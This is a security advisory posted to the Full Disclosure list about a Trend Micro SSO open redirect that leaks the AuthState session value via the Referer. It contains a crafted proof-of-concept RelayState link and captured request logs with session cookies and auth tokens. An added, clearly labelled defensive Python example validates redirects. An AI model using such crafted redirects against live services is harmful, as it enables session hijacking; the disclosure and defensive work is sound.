Message-ID: <56FD126D.1000907@vulnerability-lab.com>
Date: Thu, 31 Mar 2016 14:05:01 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability


Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694

Trend Micro ID: 1-1-1035080936


Release Date:
=============
2016-03-31


Vulnerability Laboratory ID (VL-ID):
====================================
1694


Common Vulnerability Scoring System:
====================================
6.5


Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
business. Its cloud and virtualization security products provide cloud
security for customers of VMware, Amazon AWS, Microsoft Azure and vCloud
Air. Eva Chen serves as Trend Micro’s chief executive officer, a position
she has held since 2005 when she succeeded founding CEO Steve Chang. Chang
serves as chairman of Trend Micro.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a redirect
and session web vulnerability in the official Trend Micro SSO online
service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A redirect issue with an information leak has been discovered in the
official Trend Micro online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. Following the link (which requires a login) discloses
information to the attacker's webserver.
In this case the AuthState value is leaked.

The vulnerability is located in SSOService.php. A remote attacker is
able to craft a link by modifying the RelayState parameter to point to his
webserver. After the victim clicks the link, the website requests him to
log in. After the login the victim is quietly redirected to the attacker's
webserver. The previous request includes the new AuthState in the GET
request, which includes the user's session. The AuthState is then exposed
in the Referer. The attacker can use the AuthState value to take over the
account session.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a
privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below.

Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
2. The victim is redirected to yahoo
3. The AuthState code will be cached in the Referer of the attacker's
website ... like on yahoo
4. Successful reproduction of the vulnerability!


--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]
   Request Headers:
      Host[sso1.trendmicro.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
      Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
      Connection[keep-alive]
   Response Headers:
      Date[Fri, 29 Jan 2016 12:20:22 GMT]
      Server[Apache/2.2.15 (CentOS)]
      Strict-Transport-Security[max-age=63072000; includeSubdomains; preload]
      X-Frame-Options[SAMEORIGIN]
      x-content-type-options[nosniff]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]



POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[368] Mime Type[text/html]
   Request Headers:
      Host[account.trendmicro.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]
      Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
      Connection[keep-alive]
   Post Data:
      SAMLResponse[... base64-encoded SAML response omitted ...]
      RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
   Response Headers:
      Date[Fri, 29 Jan 2016 12:20:24 GMT]
      Server[Apache]
      Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d; path=/; httponly]
      Location[https://yahoo.com/my_account/]
      Pragma[no-cache]
      Cache-Control[no-cache, must-revalidate]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      X-Frame-Options[SAMEORIGIN]
      Content-Length[368]
      Connection[close]
      Content-Type[text/html; charset=UTF-8]



GET
https://yahoo.com/my_account/
Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[382] Mime Type[text/html]
   Request Headers:
      Host[yahoo.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]
      Cookie[B=]
      Connection[keep-alive]
   Response Headers:
      Date[Fri, 29 Jan 2016 11:52:31 GMT]
      Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
      Server[ATS]
      Location[https://www.yahoo.com/my_account/]
      Content-Type[text/html]
      Content-Language[en]
      Cache-Control[no-store, no-cache]
      y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]
      Content-Length[382]
      X-Firefox-Spdy[h2]
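

The log above shows two separate faults: the IdP redirects to whatever
RelayState names, and the login URL carrying AuthState is sent on as a
Referer. The following is an added example, not part of the original advisory
and not Trend Micro's or SimpleSAMLphp's code, showing a server-side check for
each. The allowlist mapping, the default landing URL and the function names
are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: each SP entity id maps to the only origins its RelayState may
# target. "myaccount-sp" and account.trendmicro.com appear in the advisory's
# log; the mapping and the default landing URLs are hypothetical.
ALLOWED_RELAY_ORIGINS = {
    "myaccount-sp": {("https", "account.trendmicro.com", 443)},
}
DEFAULT_LANDING = {"myaccount-sp": "https://account.trendmicro.com/"}

# Sent with every page whose URL carries AuthState, so the browser never
# forwards that URL as a Referer.
LOGIN_PAGE_HEADERS = {"Referrer-Policy": "no-referrer"}


def origin(url):
    """Return (scheme, host, port) for an absolute https URL, else None."""
    # Backslashes, whitespace and control characters are parsed differently
    # by browsers and by server-side URL libraries, so refuse them outright.
    if any(c == "\\" or ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        return None
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme != "https" or not parts.hostname:
        return None                # relative, scheme-relative or non-https
    if parts.username is not None or parts.password is not None:
        return None                # "https://trusted@other-host/" form
    return (parts.scheme, parts.hostname, port or 443)


def safe_relay_state(sp_entity_id, relay_state):
    """Return relay_state only if it targets an allowlisted origin of the SP;
    otherwise return the SP's fixed landing page, never the supplied URL."""
    allowed = ALLOWED_RELAY_ORIGINS.get(sp_entity_id)
    if allowed is None:
        raise ValueError("unknown SP entity id")
    if relay_state and origin(relay_state) in allowed:
        return relay_state
    return DEFAULT_LANDING[sp_entity_id]


def referer_leaks_authstate(request_url, referer):
    """True when a request to a different origin carries a Referer whose
    query string contains AuthState (the condition visible in the last
    request of the log). Useful when reviewing a captured session."""
    if "AuthState" not in parse_qs(urlsplit(referer).query):
        return False
    return origin(request_url) != origin(referer)


# Constructed sample: same shape as the Referer in the log, with a
# placeholder in place of the real AuthState value.
SAMPLE_REFERER = (
    "https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php"
    "?AuthState=_PLACEHOLDER%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin"
    "%2Ftmsaml%2Fidp%2FSSOService.php"
)

if __name__ == "__main__":
    # The RelayState from the advisory is replaced by the fixed landing page.
    print(safe_relay_state("myaccount-sp", "https://yahoo.com/my_account/"))
    # The off-site request from the log is flagged as leaking AuthState.
    print(referer_leaks_authstate("https://yahoo.com/my_account/", SAMPLE_REFERER))
```

Validation belongs at the point where the redirect is issued, on the decoded
RelayState value, and the Referrer-Policy header covers the case where an
off-site navigation still happens from a page with AuthState in its URL.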


Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
Trend Micro SSO online service web-application is estimated as high.
(CVSS 6.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution Security GmbH]
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab or its suppliers have been advised of the possibility of
such damages. Some states do not allow the exclusion or limitation of
liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or
trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@...nerability-lab.com - research@...nerability-lab.com - admin@...lution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by Vulnerability-Lab Research Team or its suppliers. All pictures,
texts, advisories, source code, videos and other information on this
website is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a
permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/